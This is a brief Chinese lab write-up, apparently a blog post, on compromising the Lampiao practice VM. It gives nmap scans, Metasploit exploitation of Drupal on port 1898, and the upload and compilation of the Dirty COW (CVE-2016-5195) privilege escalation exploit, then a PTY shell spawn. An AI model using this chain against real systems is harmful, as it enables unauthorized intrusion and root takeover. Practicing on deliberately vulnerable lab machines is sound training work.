环境准备
- 靶机-lampiao
- 攻击机-kali
演示
使用nmap探测内网网络,我这里使用NAT网络,网段为192.168.116.0/24
nmap 192.168.116.0/24
发现192.168.116.136存活,扫描全端口
nmap -p 1-65535 192.168.116.136
访问1898端口发现为drupal
使用msf来进行攻击
search drupal
这里使用模块1,use 1,配置参数
权限为www-data权限,上传提权脚本
https://github.com/gbonacini/CVE-2016-5195
上传命令
upload /root/cve-2016-5195/dcow.cpp /tmp/dcow.cpp
编译脚本
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil
之后切换到bash shell下执行
python -c 'import pty; pty.spawn("/bin/bash")'
标签:lampiao,192.168,提权,脏牛,dcow,cpp,nmap From: https://www.cnblogs.com/re8sd/p/17965497